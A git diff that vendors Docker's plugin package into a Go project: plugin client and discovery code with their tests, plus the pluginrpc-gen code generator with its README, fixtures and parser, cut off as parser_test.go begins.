+	"github.com/docker/go-connections/tlsconfig"
+)
+
+var (
+	mux    *http.ServeMux
+	server *httptest.Server
+)
+
+func setupRemotePluginServer() string {
+	mux = http.NewServeMux()
+	server = httptest.NewServer(mux)
+	return server.URL
+}
+
+func teardownRemotePluginServer() {
+	if server != nil {
+		server.Close()
+	}
+}
+
+func TestFailedConnection(t *testing.T) {
+	c, _ := NewClient("tcp://127.0.0.1:1", &tlsconfig.Options{InsecureSkipVerify: true})
+	_, err := c.callWithRetry("Service.Method", nil, false)
+	if err == nil {
+		t.Fatal("Unexpected successful connection")
+	}
+}
+
+func TestEchoInputOutput(t *testing.T) {
+	addr := setupRemotePluginServer()
+	defer teardownRemotePluginServer()
+
+	m := Manifest{[]string{"VolumeDriver", "NetworkDriver"}}
+
+	mux.HandleFunc("/Test.Echo", func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != "POST" {
+			t.Fatalf("Expected POST, got %s\n", r.Method)
+		}
+
+		header := w.Header()
+		header.Set("Content-Type", transport.VersionMimetype)
+
+		io.Copy(w, r.Body)
+	})
+
+	c, _ := NewClient(addr, &tlsconfig.Options{InsecureSkipVerify: true})
+	var output Manifest
+	err := c.Call("Test.Echo", m, &output)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if !reflect.DeepEqual(output, m) {
+		t.Fatalf("Expected %v, was %v\n", m, output)
+	}
+	err = c.Call("Test.Echo", nil, nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestBackoff(t *testing.T) {
+	cases := []struct {
+		retries    int
+		expTimeOff time.Duration
+	}{
+		{0, time.Duration(1)},
+		{1, time.Duration(2)},
+		{2, time.Duration(4)},
+		{4, time.Duration(16)},
+		{6, time.Duration(30)},
+		{10, time.Duration(30)},
+	}
+
+	for _, c := range cases {
+		s := c.expTimeOff * time.Second
+		if d := backoff(c.retries); d != s {
+			t.Fatalf("Retry %v, expected %v, was %v\n", c.retries, s, d)
+		}
+	}
+}
+
+func TestAbortRetry(t *testing.T) {
+	cases := []struct {
+		timeOff  time.Duration
+		expAbort bool
+	}{
+		{time.Duration(1), false},
+		{time.Duration(2), false},
+		{time.Duration(10), false},
+		{time.Duration(30), true},
+		{time.Duration(40), true},
+	}
+
+	for _, c := range cases {
+		s := c.timeOff * time.Second
+		if a := abort(time.Now(), s); a != c.expAbort {
+			t.Fatalf("Duration %v, expected %v, was %v\n", c.timeOff, s, a)
+		}
+	}
+}
+
+func TestClientScheme(t *testing.T) {
+	cases := map[string]string{
+		"tcp://127.0.0.1:8080":          "http",
+		"unix:///usr/local/plugins/foo": "http",
+		"http://127.0.0.1:8080":         "http",
+		"https://127.0.0.1:8080":        "https",
+	}
+
+	for addr, scheme := range cases {
+		u, err := url.Parse(addr)
+		if err != nil {
+			t.Fatal(err)
+		}
+		s := httpScheme(u)
+
+		if s != scheme {
+			t.Fatalf("URL scheme mismatch, expected %s, got %s", scheme, s)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery.go b/vendor/github.com/docker/docker/pkg/plugins/discovery.go
new file mode 100644
index 0000000000..e99581c573
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/discovery.go
@@ -0,0 +1,131 @@
+package plugins
+
+import (
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io/ioutil"
+	"net/url"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync"
+)
+
+var (
+	// ErrNotFound plugin not found
+	ErrNotFound = errors.New("plugin not found")
+	socketsPath = "/run/docker/plugins"
+)
+
+// localRegistry defines a registry that is local (using unix socket).
+type localRegistry struct{}
+
+func newLocalRegistry() localRegistry {
+	return localRegistry{}
+}
+
+// Scan scans all the plugin paths and returns all the names it found
+func Scan() ([]string, error) {
+	var names []string
+	if err := filepath.Walk(socketsPath, func(path string, fi os.FileInfo, err error) error {
+		if err != nil {
+			return nil
+		}
+
+		if fi.Mode()&os.ModeSocket != 0 {
+			name := strings.TrimSuffix(fi.Name(), filepath.Ext(fi.Name()))
+			names = append(names, name)
+		}
+		return nil
+	}); err != nil {
+		return nil, err
+	}
+
+	for _, path := range specsPaths {
+		if err := filepath.Walk(path, func(p string, fi os.FileInfo, err error) error {
+			if err != nil || fi.IsDir() {
+				return nil
+			}
+			name := strings.TrimSuffix(fi.Name(), filepath.Ext(fi.Name()))
+			names = append(names, name)
+			return nil
+		}); err != nil {
+			return nil, err
+		}
+	}
+	return names, nil
+}
+
+// Plugin returns the plugin registered with the given name (or returns an error).
+func (l *localRegistry) Plugin(name string) (*Plugin, error) {
+	socketpaths := pluginPaths(socketsPath, name, ".sock")
+
+	for _, p := range socketpaths {
+		if fi, err := os.Stat(p); err == nil && fi.Mode()&os.ModeSocket != 0 {
+			return NewLocalPlugin(name, "unix://"+p), nil
+		}
+	}
+
+	var txtspecpaths []string
+	for _, p := range specsPaths {
+		txtspecpaths = append(txtspecpaths, pluginPaths(p, name, ".spec")...)
+		txtspecpaths = append(txtspecpaths, pluginPaths(p, name, ".json")...)
+	}
+
+	for _, p := range txtspecpaths {
+		if _, err := os.Stat(p); err == nil {
+			if strings.HasSuffix(p, ".json") {
+				return readPluginJSONInfo(name, p)
+			}
+			return readPluginInfo(name, p)
+		}
+	}
+	return nil, ErrNotFound
+}
+
+func readPluginInfo(name, path string) (*Plugin, error) {
+	content, err := ioutil.ReadFile(path)
+	if err != nil {
+		return nil, err
+	}
+	addr := strings.TrimSpace(string(content))
+
+	u, err := url.Parse(addr)
+	if err != nil {
+		return nil, err
+	}
+
+	if len(u.Scheme) == 0 {
+		return nil, fmt.Errorf("Unknown protocol")
+	}
+
+	return NewLocalPlugin(name, addr), nil
+}
+
+func readPluginJSONInfo(name, path string) (*Plugin, error) {
+	f, err := os.Open(path)
+	if err != nil {
+		return nil, err
+	}
+	defer f.Close()
+
+	var p Plugin
+	if err := json.NewDecoder(f).Decode(&p); err != nil {
+		return nil, err
+	}
+	p.name = name
+	if p.TLSConfig != nil && len(p.TLSConfig.CAFile) == 0 {
+		p.TLSConfig.InsecureSkipVerify = true
+	}
+	p.activateWait = sync.NewCond(&sync.Mutex{})
+
+	return &p, nil
+}
+
+func pluginPaths(base, name, ext string) []string {
+	return []string{
+		filepath.Join(base, name+ext),
+		filepath.Join(base, name, name+ext),
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go
new file mode 100644
index 0000000000..03f9d00319
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go
@@ -0,0 +1,152 @@
+package plugins
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func Setup(t *testing.T) (string, func()) {
+	tmpdir, err := ioutil.TempDir("", "docker-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	backup := socketsPath
+	socketsPath = tmpdir
+	specsPaths = []string{tmpdir}
+
+	return tmpdir, func() {
+		socketsPath = backup
+		os.RemoveAll(tmpdir)
+	}
+}
+
+func TestFileSpecPlugin(t *testing.T) {
+	tmpdir, unregister := Setup(t)
+	defer unregister()
+
+	cases := []struct {
+		path string
+		name string
+		addr string
+		fail bool
+	}{
+		// TODO Windows: Factor out the unix:// variants.
+		{filepath.Join(tmpdir, "echo.spec"), "echo", "unix://var/lib/docker/plugins/echo.sock", false},
+		{filepath.Join(tmpdir, "echo", "echo.spec"), "echo", "unix://var/lib/docker/plugins/echo.sock", false},
+		{filepath.Join(tmpdir, "foo.spec"), "foo", "tcp://localhost:8080", false},
+		{filepath.Join(tmpdir, "foo", "foo.spec"), "foo", "tcp://localhost:8080", false},
+		{filepath.Join(tmpdir, "bar.spec"), "bar", "localhost:8080", true}, // unknown transport
+	}
+
+	for _, c := range cases {
+		if err := os.MkdirAll(filepath.Dir(c.path), 0755); err != nil {
+			t.Fatal(err)
+		}
+		if err := ioutil.WriteFile(c.path, []byte(c.addr), 0644); err != nil {
+			t.Fatal(err)
+		}
+
+		r := newLocalRegistry()
+		p, err := r.Plugin(c.name)
+		if c.fail && err == nil {
+			continue
+		}
+
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		if p.name != c.name {
+			t.Fatalf("Expected plugin `%s`, got %s\n", c.name, p.name)
+		}
+
+		if p.Addr != c.addr {
+			t.Fatalf("Expected plugin addr `%s`, got %s\n", c.addr, p.Addr)
+		}
+
+		if p.TLSConfig.InsecureSkipVerify != true {
+			t.Fatalf("Expected TLS verification to be skipped")
+		}
+	}
+}
+
+func TestFileJSONSpecPlugin(t *testing.T) {
+	tmpdir, unregister := Setup(t)
+	defer unregister()
+
+	p := filepath.Join(tmpdir, "example.json")
+	spec := `{
+  "Name": "plugin-example",
+  "Addr": "https://example.com/docker/plugin",
+  "TLSConfig": {
+    "CAFile": "/usr/shared/docker/certs/example-ca.pem",
+    "CertFile": "/usr/shared/docker/certs/example-cert.pem",
+    "KeyFile": "/usr/shared/docker/certs/example-key.pem"
+	}
+}`
+
+	if err := ioutil.WriteFile(p, []byte(spec), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	r := newLocalRegistry()
+	plugin, err := r.Plugin("example")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if expected, actual := "example", plugin.name; expected != actual {
+		t.Fatalf("Expected plugin %q, got %s\n", expected, actual)
+	}
+
+	if plugin.Addr != "https://example.com/docker/plugin" {
+		t.Fatalf("Expected plugin addr `https://example.com/docker/plugin`, got %s\n", plugin.Addr)
+	}
+
+	if plugin.TLSConfig.CAFile != "/usr/shared/docker/certs/example-ca.pem" {
+		t.Fatalf("Expected plugin CA `/usr/shared/docker/certs/example-ca.pem`, got %s\n", plugin.TLSConfig.CAFile)
+	}
+
+	if plugin.TLSConfig.CertFile != "/usr/shared/docker/certs/example-cert.pem" {
+		t.Fatalf("Expected plugin Certificate `/usr/shared/docker/certs/example-cert.pem`, got %s\n", plugin.TLSConfig.CertFile)
+	}
+
+	if plugin.TLSConfig.KeyFile != "/usr/shared/docker/certs/example-key.pem" {
+		t.Fatalf("Expected plugin Key `/usr/shared/docker/certs/example-key.pem`, got %s\n", plugin.TLSConfig.KeyFile)
+	}
+}
+
+func TestFileJSONSpecPluginWithoutTLSConfig(t *testing.T) {
+	tmpdir, unregister := Setup(t)
+	defer unregister()
+
+	p := filepath.Join(tmpdir, "example.json")
+	spec := `{
+  "Name": "plugin-example",
+  "Addr": "https://example.com/docker/plugin"
+}`
+
+	if err := ioutil.WriteFile(p, []byte(spec), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	r := newLocalRegistry()
+	plugin, err := r.Plugin("example")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if expected, actual := "example", plugin.name; expected != actual {
+		t.Fatalf("Expected plugin %q, got %s\n", expected, actual)
+	}
+
+	if plugin.Addr != "https://example.com/docker/plugin" {
+		t.Fatalf("Expected plugin addr `https://example.com/docker/plugin`, got %s\n", plugin.Addr)
+	}
+
+	if plugin.TLSConfig != nil {
+		t.Fatalf("Expected plugin TLSConfig nil, got %v\n", plugin.TLSConfig)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go
new file mode 100644
index 0000000000..693a47e394
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go
@@ -0,0 +1,5 @@
+// +build !windows
+
+package plugins
+
+var specsPaths = []string{"/etc/docker/plugins", "/usr/lib/docker/plugins"}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go
new file mode 100644
index 0000000000..3e2d506b97
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go
@@ -0,0 +1,61 @@
+// +build !windows
+
+package plugins
+
+import (
+	"fmt"
+	"net"
+	"os"
+	"path/filepath"
+	"reflect"
+	"testing"
+)
+
+func TestLocalSocket(t *testing.T) {
+	// TODO Windows: Enable a similar version for Windows named pipes
+	tmpdir, unregister := Setup(t)
+	defer unregister()
+
+	cases := []string{
+		filepath.Join(tmpdir, "echo.sock"),
+		filepath.Join(tmpdir, "echo", "echo.sock"),
+	}
+
+	for _, c := range cases {
+		if err := os.MkdirAll(filepath.Dir(c), 0755); err != nil {
+			t.Fatal(err)
+		}
+
+		l, err := net.Listen("unix", c)
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		r := newLocalRegistry()
+		p, err := r.Plugin("echo")
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		pp, err := r.Plugin("echo")
+		if err != nil {
+			t.Fatal(err)
+		}
+		if !reflect.DeepEqual(p, pp) {
+			t.Fatalf("Expected %v, was %v\n", p, pp)
+		}
+
+		if p.name != "echo" {
+			t.Fatalf("Expected plugin `echo`, got %s\n", p.name)
+		}
+
+		addr := fmt.Sprintf("unix://%s", c)
+		if p.Addr != addr {
+			t.Fatalf("Expected plugin addr `%s`, got %s\n", addr, p.Addr)
+		}
+		if p.TLSConfig.InsecureSkipVerify != true {
+			t.Fatalf("Expected TLS verification to be skipped")
+		}
+		l.Close()
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go
new file mode 100644
index 0000000000..d7c1fe4942
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go
@@ -0,0 +1,8 @@
+package plugins
+
+import (
+	"os"
+	"path/filepath"
+)
+
+var specsPaths = []string{filepath.Join(os.Getenv("programdata"), "docker", "plugins")}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/errors.go b/vendor/github.com/docker/docker/pkg/plugins/errors.go
new file mode 100644
index 0000000000..7988471026
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/errors.go
@@ -0,0 +1,33 @@
+package plugins
+
+import (
+	"fmt"
+	"net/http"
+)
+
+type statusError struct {
+	status int
+	method string
+	err    string
+}
+
+// Error returns a formatted string for this error type
+func (e *statusError) Error() string {
+	return fmt.Sprintf("%s: %v", e.method, e.err)
+}
+
+// IsNotFound indicates if the passed in error is from an http.StatusNotFound from the plugin
+func IsNotFound(err error) bool {
+	return isStatusError(err, http.StatusNotFound)
+}
+
+func isStatusError(err error, status int) bool {
+	if err == nil {
+		return false
+	}
+	e, ok := err.(*statusError)
+	if !ok {
+		return false
+	}
+	return e.status == status
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go b/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go
new file mode 100644
index 0000000000..b19c0d52f1
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go
@@ -0,0 +1,44 @@
+package plugins
+
+import (
+	"errors"
+	"path/filepath"
+	"runtime"
+	"sync"
+	"testing"
+	"time"
+)
+
+// regression test for deadlock in handlers
+func TestPluginAddHandler(t *testing.T) {
+	// make a plugin which is pre-activated
+	p := &Plugin{activateWait: sync.NewCond(&sync.Mutex{})}
+	p.Manifest = &Manifest{Implements: []string{"bananas"}}
+	storage.plugins["qwerty"] = p
+
+	testActive(t, p)
+	Handle("bananas", func(_ string, _ *Client) {})
+	testActive(t, p)
+}
+
+func TestPluginWaitBadPlugin(t *testing.T) {
+	p := &Plugin{activateWait: sync.NewCond(&sync.Mutex{})}
+	p.activateErr = errors.New("some junk happened")
+	testActive(t, p)
+}
+
+func testActive(t *testing.T, p *Plugin) {
+	done := make(chan struct{})
+	go func() {
+		p.waitActive()
+		close(done)
+	}()
+
+	select {
+	case <-time.After(100 * time.Millisecond):
+		_, f, l, _ := runtime.Caller(1)
+		t.Fatalf("%s:%d: deadlock in waitActive", filepath.Base(f), l)
+	case <-done:
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md
new file mode 100644
index 0000000000..0418a3e00a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md
@@ -0,0 +1,58 @@
+Plugin RPC Generator
+====================
+
+Generates go code from a Go interface definition for proxying between the plugin
+API and the subsystem being extended.
+
+## Usage
+
+Given an interface definition:
+
+```go
+type volumeDriver interface {
+	Create(name string, opts opts) (err error)
+	Remove(name string) (err error)
+	Path(name string) (mountpoint string, err error)
+	Mount(name string) (mountpoint string, err error)
+	Unmount(name string) (err error)
+}
+```
+
+**Note**: All function options and return values must be named in the definition.
+
+Run the generator:
+
+```bash
+$ pluginrpc-gen --type volumeDriver --name VolumeDriver -i volumes/drivers/extpoint.go -o volumes/drivers/proxy.go
+```
+
+Where:
+- `--type` is the name of the interface to use
+- `--name` is the subsystem that the plugin "Implements"
+- `-i` is the input file containing the interface definition
+- `-o` is the output file where the the generated code should go
+
+**Note**: The generated code will use the same package name as the one defined in the input file
+
+Optionally, you can skip functions on the interface that should not be
+implemented in the generated proxy code by passing in the function name to `--skip`.
+This flag can be specified multiple times.
+
+You can also add build tags that should be prepended to the generated code by
+supplying `--tag`. This flag can be specified multiple times.
+
+## Known issues
+
+## go-generate
+
+You can also use this with go-generate, which is pretty awesome.  
+To do so, place the code at the top of the file which contains the interface
+definition (i.e., the input file):
+
+```go
+//go:generate pluginrpc-gen -i $GOFILE -o proxy.go -type volumeDriver -name VolumeDriver
+```
+
+Then cd to the package dir and run `go generate`
+
+**Note**: the `pluginrpc-gen` binary must be within your `$PATH`
diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go
new file mode 100644
index 0000000000..5695dcc2d4
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go
@@ -0,0 +1,89 @@
+package foo
+
+import (
+	"fmt"
+
+	aliasedio "io"
+
+	"github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture"
+)
+
+var (
+	errFakeImport = fmt.Errorf("just to import fmt for imports tests")
+)
+
+type wobble struct {
+	Some      string
+	Val       string
+	Inception *wobble
+}
+
+// Fooer is an empty interface used for tests.
+type Fooer interface{}
+
+// Fooer2 is an interface used for tests.
+type Fooer2 interface {
+	Foo()
+}
+
+// Fooer3 is an interface used for tests.
+type Fooer3 interface {
+	Foo()
+	Bar(a string)
+	Baz(a string) (err error)
+	Qux(a, b string) (val string, err error)
+	Wobble() (w *wobble)
+	Wiggle() (w wobble)
+	WiggleWobble(a []*wobble, b []wobble, c map[string]*wobble, d map[*wobble]wobble, e map[string][]wobble, f []*otherfixture.Spaceship) (g map[*wobble]wobble, h [][]*wobble, i otherfixture.Spaceship, j *otherfixture.Spaceship, k map[*otherfixture.Spaceship]otherfixture.Spaceship, l []otherfixture.Spaceship)
+}
+
+// Fooer4 is an interface used for tests.
+type Fooer4 interface {
+	Foo() error
+}
+
+// Bar is an interface used for tests.
+type Bar interface {
+	Boo(a string, b string) (s string, err error)
+}
+
+// Fooer5 is an interface used for tests.
+type Fooer5 interface {
+	Foo()
+	Bar
+}
+
+// Fooer6 is an interface used for tests.
+type Fooer6 interface {
+	Foo(a otherfixture.Spaceship)
+}
+
+// Fooer7 is an interface used for tests.
+type Fooer7 interface {
+	Foo(a *otherfixture.Spaceship)
+}
+
+// Fooer8 is an interface used for tests.
+type Fooer8 interface {
+	Foo(a map[string]otherfixture.Spaceship)
+}
+
+// Fooer9 is an interface used for tests.
+type Fooer9 interface {
+	Foo(a map[string]*otherfixture.Spaceship)
+}
+
+// Fooer10 is an interface used for tests.
+type Fooer10 interface {
+	Foo(a []otherfixture.Spaceship)
+}
+
+// Fooer11 is an interface used for tests.
+type Fooer11 interface {
+	Foo(a []*otherfixture.Spaceship)
+}
+
+// Fooer12 is an interface used for tests.
+type Fooer12 interface {
+	Foo(a aliasedio.Reader)
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go
new file mode 100644
index 0000000000..1937d1786c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go
@@ -0,0 +1,4 @@
+package otherfixture
+
+// Spaceship is a fixture for tests
+type Spaceship struct{}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/main.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/main.go
new file mode 100644
index 0000000000..e77a7d45ff
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/main.go
@@ -0,0 +1,91 @@
+package main
+
+import (
+	"bytes"
+	"flag"
+	"fmt"
+	"go/format"
+	"io/ioutil"
+	"os"
+	"unicode"
+	"unicode/utf8"
+)
+
+type stringSet struct {
+	values map[string]struct{}
+}
+
+func (s stringSet) String() string {
+	return ""
+}
+
+func (s stringSet) Set(value string) error {
+	s.values[value] = struct{}{}
+	return nil
+}
+func (s stringSet) GetValues() map[string]struct{} {
+	return s.values
+}
+
+var (
+	typeName   = flag.String("type", "", "interface type to generate plugin rpc proxy for")
+	rpcName    = flag.String("name", *typeName, "RPC name, set if different from type")
+	inputFile  = flag.String("i", "", "input file path")
+	outputFile = flag.String("o", *inputFile+"_proxy.go", "output file path")
+
+	skipFuncs   map[string]struct{}
+	flSkipFuncs = stringSet{make(map[string]struct{})}
+
+	flBuildTags = stringSet{make(map[string]struct{})}
+)
+
+func errorOut(msg string, err error) {
+	if err == nil {
+		return
+	}
+	fmt.Fprintf(os.Stderr, "%s: %v\n", msg, err)
+	os.Exit(1)
+}
+
+func checkFlags() error {
+	if *outputFile == "" {
+		return fmt.Errorf("missing required flag `-o`")
+	}
+	if *inputFile == "" {
+		return fmt.Errorf("missing required flag `-i`")
+	}
+	return nil
+}
+
+func main() {
+	flag.Var(flSkipFuncs, "skip", "skip parsing for function")
+	flag.Var(flBuildTags, "tag", "build tags to add to generated files")
+	flag.Parse()
+	skipFuncs = flSkipFuncs.GetValues()
+
+	errorOut("error", checkFlags())
+
+	pkg, err := Parse(*inputFile, *typeName)
+	errorOut(fmt.Sprintf("error parsing requested type %s", *typeName), err)
+
+	var analysis = struct {
+		InterfaceType string
+		RPCName       string
+		BuildTags     map[string]struct{}
+		*ParsedPkg
+	}{toLower(*typeName), *rpcName, flBuildTags.GetValues(), pkg}
+	var buf bytes.Buffer
+
+	errorOut("parser error", generatedTempl.Execute(&buf, analysis))
+	src, err := format.Source(buf.Bytes())
+	errorOut("error formatting generated source:\n"+buf.String(), err)
+	errorOut("error writing file", ioutil.WriteFile(*outputFile, src, 0644))
+}
+
+func toLower(s string) string {
+	if s == "" {
+		return ""
+	}
+	r, n := utf8.DecodeRuneInString(s)
+	return string(unicode.ToLower(r)) + s[n:]
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser.go
new file mode 100644
index 0000000000..6c547e18cf
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser.go
@@ -0,0 +1,263 @@
+package main
+
+import (
+	"errors"
+	"fmt"
+	"go/ast"
+	"go/parser"
+	"go/token"
+	"path"
+	"reflect"
+	"strings"
+)
+
+var errBadReturn = errors.New("found return arg with no name: all args must be named")
+
+type errUnexpectedType struct {
+	expected string
+	actual   interface{}
+}
+
+func (e errUnexpectedType) Error() string {
+	return fmt.Sprintf("got wrong type expecting %s, got: %v", e.expected, reflect.TypeOf(e.actual))
+}
+
+// ParsedPkg holds information about a package that has been parsed,
+// its name and the list of functions.
+type ParsedPkg struct {
+	Name      string
+	Functions []function
+	Imports   []importSpec
+}
+
+type function struct {
+	Name    string
+	Args    []arg
+	Returns []arg
+	Doc     string
+}
+
+type arg struct {
+	Name            string
+	ArgType         string
+	PackageSelector string
+}
+
+func (a *arg) String() string {
+	return a.Name + " " + a.ArgType
+}
+
+type importSpec struct {
+	Name string
+	Path string
+}
+
+func (s *importSpec) String() string {
+	var ss string
+	if len(s.Name) != 0 {
+		ss += s.Name
+	}
+	ss += s.Path
+	return ss
+}
+
+// Parse parses the given file for an interface definition with the given name.
+func Parse(filePath string, objName string) (*ParsedPkg, error) {
+	fs := token.NewFileSet()
+	pkg, err := parser.ParseFile(fs, filePath, nil, parser.AllErrors)
+	if err != nil {
+		return nil, err
+	}
+	p := &ParsedPkg{}
+	p.Name = pkg.Name.Name
+	obj, exists := pkg.Scope.Objects[objName]
+	if !exists {
+		return nil, fmt.Errorf("could not find object %s in %s", objName, filePath)
+	}
+	if obj.Kind != ast.Typ {
+		return nil, fmt.Errorf("exected type, got %s", obj.Kind)
+	}
+	spec, ok := obj.Decl.(*ast.TypeSpec)
+	if !ok {
+		return nil, errUnexpectedType{"*ast.TypeSpec", obj.Decl}
+	}
+	iface, ok := spec.Type.(*ast.InterfaceType)
+	if !ok {
+		return nil, errUnexpectedType{"*ast.InterfaceType", spec.Type}
+	}
+
+	p.Functions, err = parseInterface(iface)
+	if err != nil {
+		return nil, err
+	}
+
+	// figure out what imports will be needed
+	imports := make(map[string]importSpec)
+	for _, f := range p.Functions {
+		args := append(f.Args, f.Returns...)
+		for _, arg := range args {
+			if len(arg.PackageSelector) == 0 {
+				continue
+			}
+
+			for _, i := range pkg.Imports {
+				if i.Name != nil {
+					if i.Name.Name != arg.PackageSelector {
+						continue
+					}
+					imports[i.Path.Value] = importSpec{Name: arg.PackageSelector, Path: i.Path.Value}
+					break
+				}
+
+				_, name := path.Split(i.Path.Value)
+				splitName := strings.Split(name, "-")
+				if len(splitName) > 1 {
+					name = splitName[len(splitName)-1]
+				}
+				// import paths have quotes already added in, so need to remove them for name comparison
+				name = strings.TrimPrefix(name, `"`)
+				name = strings.TrimSuffix(name, `"`)
+				if name == arg.PackageSelector {
+					imports[i.Path.Value] = importSpec{Path: i.Path.Value}
+					break
+				}
+			}
+		}
+	}
+
+	for _, spec := range imports {
+		p.Imports = append(p.Imports, spec)
+	}
+
+	return p, nil
+}
+
+func parseInterface(iface *ast.InterfaceType) ([]function, error) {
+	var functions []function
+	for _, field := range iface.Methods.List {
+		switch f := field.Type.(type) {
+		case *ast.FuncType:
+			method, err := parseFunc(field)
+			if err != nil {
+				return nil, err
+			}
+			if method == nil {
+				continue
+			}
+			functions = append(functions, *method)
+		case *ast.Ident:
+			spec, ok := f.Obj.Decl.(*ast.TypeSpec)
+			if !ok {
+				return nil, errUnexpectedType{"*ast.TypeSpec", f.Obj.Decl}
+			}
+			iface, ok := spec.Type.(*ast.InterfaceType)
+			if !ok {
+				return nil, errUnexpectedType{"*ast.TypeSpec", spec.Type}
+			}
+			funcs, err := parseInterface(iface)
+			if err != nil {
+				fmt.Println(err)
+				continue
+			}
+			functions = append(functions, funcs...)
+		default:
+			return nil, errUnexpectedType{"*astFuncType or *ast.Ident", f}
+		}
+	}
+	return functions, nil
+}
+
+func parseFunc(field *ast.Field) (*function, error) {
+	f := field.Type.(*ast.FuncType)
+	method := &function{Name: field.Names[0].Name}
+	if _, exists := skipFuncs[method.Name]; exists {
+		fmt.Println("skipping:", method.Name)
+		return nil, nil
+	}
+	if f.Params != nil {
+		args, err := parseArgs(f.Params.List)
+		if err != nil {
+			return nil, err
+		}
+		method.Args = args
+	}
+	if f.Results != nil {
+		returns, err := parseArgs(f.Results.List)
+		if err != nil {
+			return nil, fmt.Errorf("error parsing function returns for %q: %v", method.Name, err)
+		}
+		method.Returns = returns
+	}
+	return method, nil
+}
+
+func parseArgs(fields []*ast.Field) ([]arg, error) {
+	var args []arg
+	for _, f := range fields {
+		if len(f.Names) == 0 {
+			return nil, errBadReturn
+		}
+		for _, name := range f.Names {
+			p, err := parseExpr(f.Type)
+			if err != nil {
+				return nil, err
+			}
+			args = append(args, arg{name.Name, p.value, p.pkg})
+		}
+	}
+	return args, nil
+}
+
+type parsedExpr struct {
+	value string
+	pkg   string
+}
+
+func parseExpr(e ast.Expr) (parsedExpr, error) {
+	var parsed parsedExpr
+	switch i := e.(type) {
+	case *ast.Ident:
+		parsed.value += i.Name
+	case *ast.StarExpr:
+		p, err := parseExpr(i.X)
+		if err != nil {
+			return parsed, err
+		}
+		parsed.value += "*"
+		parsed.value += p.value
+		parsed.pkg = p.pkg
+	case *ast.SelectorExpr:
+		p, err := parseExpr(i.X)
+		if err != nil {
+			return parsed, err
+		}
+		parsed.pkg = p.value
+		parsed.value += p.value + "."
+		parsed.value += i.Sel.Name
+	case *ast.MapType:
+		parsed.value += "map["
+		p, err := parseExpr(i.Key)
+		if err != nil {
+			return parsed, err
+		}
+		parsed.value += p.value
+		parsed.value += "]"
+		p, err = parseExpr(i.Value)
+		if err != nil {
+			return parsed, err
+		}
+		parsed.value += p.value
+		parsed.pkg = p.pkg
+	case *ast.ArrayType:
+		parsed.value += "[]"
+		p, err := parseExpr(i.Elt)
+		if err != nil {
+			return parsed, err
+		}
+		parsed.value += p.value
+		parsed.pkg = p.pkg
+	default:
+		return parsed, errUnexpectedType{"*ast.Ident or *ast.StarExpr", i}
+	}
+	return parsed, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go
new file mode 100644
index 0000000000..a1b1ac9567
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go
@@ -0,0 +1,222 @@
+package main
+
+import (
+	"fmt"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"testing"
+)
+
